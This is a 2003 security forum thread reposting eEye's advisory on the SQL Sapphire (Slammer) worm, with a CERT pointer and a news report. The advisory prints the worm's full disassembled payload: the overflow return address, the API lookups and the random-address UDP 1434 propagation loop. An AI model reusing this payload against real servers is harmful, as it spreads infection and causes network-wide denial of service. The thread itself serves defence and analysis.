SQL Sapphire Worm Analysis
Results 1 to 3 of 3

Thread: SQL Sapphire Worm Analysis

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    SQL Sapphire Worm Analysis

    Late Friday, January 24, 2003 we became aware of a new SQL worm spreading quickly across various networks around the world.

    Release Date: 1/25/03

    Severity: High

    Systems Affected: Microsoft SQL Server 2000 pre SP 2

    Description:
    Late Friday, January 24, 2003 we became aware of a new SQL worm spreading quickly across various networks around the world.

    The worm is spreading using a buffer overflow to exploit a flaw in Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in July, 2002 by Next Generation Security Software Ltd. The buffer overflow exists because of the way SQL improperly handles data sent to its Microsoft SQL Monitor port. Attackers leveraging this vulnerability will be executing their code as SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.

    The worm works by generating pseudo-random IP addresses to try to infect with its payload. The worm payload does not contain any additional malicious content (in the form of backdoors etc.); however, because of the nature of the worm and the speed at which it attempts to re-infect systems, it can potentially create a denial-of-service attack against infected networks.

    We have been able to verify that multiple points of connectivity on the Internet have been bogged down since 9pm Pacific Standard Time.

    It should be noted that this worm is not the same as an earlier SQL worm that used the SA/nopassword SQL vulnerability as its spread vector. This is a new worm is more devastating as it is taking advantage of a software-specific flaw rather than a configuration error. We have already had many reports of smaller networks brought down due to the flood of data from the Sapphire Worm trying to re-infect new systems.


    Corrective Action:
    We recommend that people immediately firewall SQL service ports at all of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port) to spread itself to a new system; however, it is safe practice to filter all SQL traffic at all gateways. The following is a list of SQL server ports:
    ms-sql-s 1433/tcp #Microsoft-SQL-Server
    ms-sql-s 1433/udp #Microsoft-SQL-Server
    ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
    ms-sql-m 1434/udp #Microsoft-SQL-Monitor

    Once again this worm is taking advantage of a known vulnerability that has had a patch available for many months. Microsoft has also released a recent service pack for SQL (Service Pack 3) that includes a fix for this vulnerability.

    Standalone patch:
    http://www.microsoft.com/technet/tre...hnet/security/
    bulletin/MS02-039.asp

    SQL 2000 Service Pack 3:
    http://www.microsoft.com/sql/downloads/2000/sp3.asp

    Previous SQL Service Pack versions are vulnerable.

    Technical Description
    The following is a quick run-down of what the worm's payload is doing after infection:

    1. Retrieves the address of GetProcAddress and Loadlibrary from the IAT in sqlsort.dll. It snags the necessary library base addresses and function entry points as needed.

    2. Calls gettickcount, and uses returned count as a pseudo-random seed

    3. Creates a UDP socket

    4. Performs a simple pseudo random number generation formula using the returned gettickcount value to generate an IP Address that will later be used as the target.

    5. Send worm payload in a SQL Server Resolution Service request to the pseudo random target address, on port 1434 (UDP).

    6. Return back to formula and continue generating new pseudo random addresses.


    Code:
    push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
    mov eax, 1010101h ; Reconstruct session, after the
    overflow the payload buffer
    ; get's corrupted during program
    execution but before the
    ; payload is executed. .
    xor ecx, ecx
    mov cl, 18h
    
    FIXUP:
    push eax
    loop FIXUP
    xor eax, 5010101h
    push eax
    mov ebp, esp
    push ecx
    push 6C6C642Eh
    push 32336C65h
    push 6E72656Bh ; kernel32
    push ecx
    push 746E756Fh ; GetTickCount
    push 436B6369h
    push 54746547h
    mov cx, 6C6Ch
    push ecx
    push 642E3233h ; ws2_32.dll
    push 5F327377h
    mov cx, 7465h
    push ecx
    push 6B636F73h ; socket
    mov cx, 6F74h
    push ecx
    push 646E6573h ; sendto
    mov esi, 42AE1018h ; IAT from sqlsort
    lea eax, [ebp-2Ch] ; (ws2_32.dll)
    push eax
    call dword ptr [esi] ; call loadlibrary
    push eax
    lea eax, [ebp-20h]
    push eax
    lea eax, [ebp-10h] ; (kernel32.dll)
    push eax
    call dword ptr [esi] ; loadlibrary
    push eax
    mov esi, 42AE1010h ; IAT from sqlsort
    mov ebx, [esi]
    mov eax, [ebx]
    cmp eax, 51EC8B55h ; check entry point fingerprint
    jz short VALID_GP ; Check entry point fingerprint for
    getprocaddress, if it failes
    ; fall back to GetProcAddress entry
    in another DLL version.
    ; Undetermined what dll versions
    this will succedd on. Due
    ; to the lack of reliable importing
    this may not work across all
    ; dll versions.
    mov esi, 42AE101Ch ; IAT entry -> 77EA094C
    
    VALID_GP:
    call dword ptr [esi] ; GetProcAddress
    call eax ; return from GetProcaddress =
    GetTickCount entrypoint
    xor ecx, ecx
    push ecx
    push ecx
    push eax
    xor ecx, 9B040103h
    xor ecx, 1010101h
    push ecx ; 9A050002 = port 1434 / AF_INET
    lea eax, [ebp-34h] ; (socket)
    push eax
    mov eax, [ebp-40h] ; ws2_32 base address
    push eax
    call dword ptr [esi] ; GetProcAddress
    push 11h
    push 2
    push 2
    call eax ; socket
    push eax
    lea eax, [ebp-3Ch] ; sendto
    push eax
    mov eax, [ebp-40h] ; ws2_32 base address
    push eax
    call dword ptr [esi] ; GetProcAddress
    mov esi, eax ; save sendto -> esi
    or ebx, ebx
    xor ebx, 0FFD9613Ch
    
    PRND:
    mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
    lea ecx, [eax+eax*2]
    lea edx, [eax+ecx*4]
    shl edx, 4
    add edx, eax
    shl edx, 8
    sub edx, eax
    lea eax, [eax+edx*4]
    add eax, ebx ; Pseudo Random Algorithm End
    mov [ebp-4Ch], eax
    push 10h
    lea eax, [ebp-50h]
    push eax
    xor ecx, ecx
    push ecx
    xor cx, 178h
    push ecx
    lea eax, [ebp+3]
    push eax
    mov eax, [ebp-54h]
    push eax
    call esi ; sendto
    jmp short PRND ; Jump back to Pseudo Random Algorithm
    Start
    In Closing
    We have provided brief information here as we are currently working to understand more of the worm's internal behavior. We will provide updates as they become available.

    This worm has been dubbed the "Sapphire Worm" by eEye due to the fact that several engineers had to be pulled away from local bars to begin the investigation/dissection process.

    Credit:
    Riley Hassell

    Related Links:
    SQLSecurity.com
    http://sqlsecurity.com/

    Microsoft Security Bulletin:
    http://www.microsoft.com/technet/tre...n/ms02-039.asp

    Feedback
    Please send suggestions, updates, and comments to:

    eEye Digital Security
    http://www.eEye.com
    info@eEye.com
    Source: http://www.xatrix.org/article2599.html

  2. #2
    Senior Member
    Join Date
    Nov 2002
    Posts
    382

    Are you infected?

    http://www.cert.org/advisories/CA-2003-04.html

    Activity of this worm is readily identifiable on a network by the presence of small UDP packets (we have received reports of 376-410 byte packets) from seemingly random IP addresses from across the Internet to port 1434/udp.
    You may quickly and easily check your system:
    It is unlikely that typical personal computer users will be vulnerable to this worm's infection attempts, so you probably have nothing to worry about. Most personal computers are not running Microsoft's "SQL Server", so there is no point of entry for this infection.

    To quickly verify that your system is not running Microsoft's SQL Server, and therefore can not be infected by Sapphire/Slammer worm probes, enter the following command in an "MS-DOS Prompt" window:

    netstat -an | find "1434"
    This DOS command line checks for the presence of any process "listening" on your computer's port 1434. Your system might be vulnerable only if some lines containing "1434" are printed to the screen when this command is entered. Otherwise, your computer can not be infected by this new worm.
    [shadow] SHARING KNOWLEDGE[/shadow]

  3. #3
    Senior Member
    Join Date
    Dec 2002
    Posts
    309
    update-----27th/01/2003

    Worm Attack Exposes Inadequate Security



    NEW YORK - This weekend's Internet attack has security experts worried that too many system managers are only fixing problems as they occur, rather than keeping their defenses up to date.The worm that crippled tens of thousands of computers worldwide, congested the network for countless others and even disabled Bank of America cash machines took advantage of a vulnerability in some Microsoft Corp. software that had been discovered in July.

    Microsoft had made software updates available to patch the vulnerability in its SQL Server 2000 software - used mostly by businesses and governments - but many system administrators had yet to install them when the attack hit Saturday.

    "There was a lot that could have been done between July and now," said Howard A. Schmidt, President Bush's No. 2 cybersecurity adviser. "We make sure we have air in our tires and brakes get checked. We also need to make sure we keep computers up-to-date."

    Network technicians worked Sunday to complete repairs to damage caused by Saturday's fast-spreading worm. The problem was declared largely under control Sunday, though some experts were worrying about the possibility of lingering infections appearing Monday.

    The FBI said Sunday that the attack's origin was still unknown.

    As the worm infected one computer, it was programmed to seek other victims by sending out thousands of probes a second, saturating many Internet data pipelines.

    Unlike most viruses and worms, it spread directly through network connections and did not need e-mail as a carrier. Thus, only network administrators who run the servers, not end users, could do anything to remedy the situation.

    According to Keynote Systems Inc., which measures Internet reliability and speed, network congestion increased download times at the largest U.S. Web sites by an average of 50 percent, and some sites were completely unavailable at times Saturday.

    Bruce Schneier, chief technology officer at Counterpane Internet Security, said the attack proves that relying on patches is flawed "not because it's not effective, but many don't do it."

    Two of the previous major outbreaks, Code Red and Nimda, also exploited known problems for which patches were available.

    But with more than 4,000 new vulnerabilities reported last year, according to the government-funded CERT Coordination Center at Carnegie Mellon University, system administrators can have trouble keeping up.

    Patches also take time to install and could disrupt other systems and applications. Schmidt said many network managers delay installing patches to fully test them first.

    Russ Cooper, a security analyst at TruSecure Corp., said patches are also complicated, and applying them out of order can undo an earlier fix.

    Microsoft spokesman Rick Miller said the company is working with network professionals to develop better tools, including ones to automatically scan systems for known vulnerabilities.

    A larger problem is inadequate information on which patches need to be tested and installed first, said Dan Ingevaldson at the Internet Security Systems' X-Force research arm.

    Preventing the next outbreak, security experts say, will mean rethinking security. Favored approaches range from getting vendors to make better software to paying private companies more money to handle the brunt of the work.

    Microsoft, for one, has already pledged to improve its products. Just two days before the attack on its software, Microsoft chairman Bill Gates sent out an e-mail outlining such improvements as better support for "smart cards" to replace or augment computer passwords.

    Company executives have also said they want to make security updates automatic so users could grant permission once and have multiple patches installed over the Internet whenever needed. Network managers, however, worry that such automation could inadvertently introduce problems for other applications.

    Carnegie Mellon's Software Engineering Institute is among research centers working on improving security before software is shipped - lessening the need for patches, said Brian King, Internet security analyst at Carnegie's CERT center.

    Security companies that stand to profit are pushing for more financial commitment.

    "It is cost-effective to be proactive," said David Perry of anti-virus vendor Trend Micro.

    George Kurtz, chief executive of security company Foundstone Inc., said antivirus and firewall products are no longer enough.

    "Security is a journey, not a destination," he said. "It needs continuous care and feeding like a child."

    Taken From : http://www.siliconvalley.com/mld/sil...ws/5038537.htm

    link for:

    Microsoft fix:

    http://www.microsoft.com/technet/sec...ts/slammer.asp


    Dr_Evil

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •